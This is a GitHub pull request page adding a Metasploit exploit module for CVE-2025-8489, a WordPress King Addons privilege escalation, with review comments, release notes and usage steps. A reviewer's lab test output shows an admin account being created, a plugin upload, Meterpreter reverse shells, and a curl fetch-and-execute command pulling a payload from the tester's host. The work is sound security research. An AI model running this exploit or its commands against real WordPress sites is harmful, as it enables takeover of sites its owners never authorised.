Add WordPress King Addons privilege escalation exploit (CVE-2025-8489) #20746
+421
−0
Conversation
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Chocapikk
force-pushed
the
king-addons
branch
from
8e672b8 to
b3fc1b0
Compare
ptownes-r7
reviewed
Dec 4, 2025
modules/exploits/multi/http/wp_king_addons_privilege_escalation.rb
Outdated
Show resolved
Hide resolved
ptownes-r7
reviewed
Dec 4, 2025
modules/exploits/multi/http/wp_king_addons_privilege_escalation.rb
Outdated
Show resolved
Hide resolved
ptownes-r7
reviewed
Dec 4, 2025
modules/exploits/multi/http/wp_king_addons_privilege_escalation.rb
Outdated
Show resolved
Hide resolved
jvoisin
reviewed
Dec 4, 2025
documentation/modules/exploit/multi/http/wp_king_addons_privilege_escalation.md
Outdated
Show resolved
Hide resolved
documentation/modules/exploit/multi/http/wp_king_addons_privilege_escalation.md
Outdated
Show resolved
Hide resolved
…ege_escalation.md Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
…n.rb Co-authored-by: Phil Townes <phil_townes@rapid7.com>
…n.rb Co-authored-by: Phil Townes <phil_townes@rapid7.com>
…tom.ini from documentation
jvoisin
approved these changes
Dec 9, 2025
jheysel-r7
added
rn-modules
jheysel-r7
reviewed
Dec 10, 2025
Contributor
jheysel-r7
left a comment
jheysel-r7
left a comment
There was a problem hiding this comment.
Thanks for the great module and easy to follow setup instructions 🫡
Testing
PHP Target
msf exploit(multi/http/wp_king_addons_privilege_escalation) > options
Module options (exploit/multi/http/wp_king_addons_privilege_escalation):
Name Current Setting Required Description
---- --------------- -------- -----------
EMAIL attacker@example.com yes Email for the new user
NONCE_PAGE /register/ yes Path to page containing King Addons Login Register Form widget
PASSWORD Password123! yes Password for the new user
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5, http, soc
ks5h, sapni, socks4
RHOSTS 127.0.0.1 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.
html
RPORT 5556 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
USERNAME attacker yes Username to create
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.16.199.1 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 PHP In-Memory
View the full module info with the info, or info -d command.
et msf exploit(multi/http/wp_king_addons_privilege_escalation) > set verbose true
verbose => true
run msf exploit(multi/http/wp_king_addons_privilege_escalation) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking /wp-content/plugins/king-addons/readme.txt
[*] Found version 51.1.14 in the plugin
[*] Found nonce: ae1c9631e6
[+] The target appears to be vulnerable.
[*] Acquired a plugin upload nonce: b35bbe8ee8
[*] Uploaded plugin wp_sxzlg
[*] Sending stage (41224 bytes) to 172.16.199.1
[+] Deleted ajax_ny4ad.php
[+] Deleted wp_sxzlg.php
[+] Deleted ../wp_sxzlg
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.1:57681) at 2025-12-09 15:27:05 -0800
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer : dfb3f25a6d96
OS : Linux dfb3f25a6d96 6.12.54-linuxkit #1 SMP PREEMPT_DYNAMIC Tue Nov 4 21:39:03 UTC 2025 x86_64
Architecture : x64
System Language : C
Meterpreter : php/linux
meterpreter > exit
Linux Target
msf exploit(multi/http/wp_king_addons_privilege_escalation) > set username userthree
username => userthree
msf exploit(multi/http/wp_king_addons_privilege_escalation) > set email userthree@example.com
email => userthree@example.com
rmsf exploit(multi/http/wp_king_addons_privilege_escalation) > run
[*] Command to run on remote host: curl -so ./XAkcelXpHriY http://172.16.199.1:8080/Hn-8qIL46e0vZdQpIHPToA;chmod +x ./XAkcelXpHriY;./XAkcelXpHriY&
[*] Fetch handler listening on 172.16.199.1:8080
[*] HTTP server started
[*] Adding resource /Hn-8qIL46e0vZdQpIHPToA
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking /wp-content/plugins/king-addons/readme.txt
[*] Found version 51.1.14 in the plugin
[*] Found nonce: ae1c9631e6
[+] The target appears to be vulnerable.
[*] Acquired a plugin upload nonce: d9a703d7bc
[*] Uploaded plugin wp_aao1q
[*] Client 172.16.199.1 requested /Hn-8qIL46e0vZdQpIHPToA
[*] Sending payload to 172.16.199.1 (curl/7.74.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 172.16.199.1
[+] Deleted ajax_zp69g.php
[+] Deleted wp_aao1q.php
[+] Deleted ../wp_aao1q
[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.1:62548) at 2025-12-09 15:52:30 -0800
meterpreter > getuid
sysinServer username: www-data
fometerpreter > sysinfo
Computer : 172.20.0.3
OS : Debian 11.8 (Linux 6.12.54-linuxkit)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > exit
modules/exploits/multi/http/wp_king_addons_privilege_escalation.rb
Outdated
Show resolved
Hide resolved
modules/exploits/multi/http/wp_king_addons_privilege_escalation.rb
Outdated
Show resolved
Hide resolved
…n.rb Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
…n.rb Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
jheysel-r7
approved these changes
Dec 10, 2025
Contributor
Release NotesThis adds an exploit module for CVE-2025-8489, an unauthenticated privilege escalation vulnerability in the WordPress King Addons for Elementor plugin (versions 24.12.92 to 51.1.14). The vulnerability allows unauthenticated attackers to create administrator accounts by specifying the user_role parameter during registration, enabling remote code execution through plugin upload. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
4 participants
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
Hello Metasploit Team,
This PR adds an exploit module for CVE-2025-8489, an unauthenticated privilege escalation vulnerability in the WordPress King Addons for Elementor plugin (versions 24.12.92 to 51.1.14). The vulnerability allows unauthenticated attackers to create administrator accounts by specifying the
user_roleparameter during registration, enabling remote code execution through plugin upload.The plugin has over 10,000 active installations according to WordPress.org statistics.
Prerequisites:
users_can_registeroption)Verification
msfconsoleuse exploit/multi/http/wp_king_addons_privilege_escalationRHOSTSto target IPNONCE_PAGEto the path of a page containing the King Addons Login Register Form widget (e.g.,/register/)USERNAME,PASSWORD, andEMAILfor the administrator account to createPAYLOADandLHOST/LPORTrunReferences: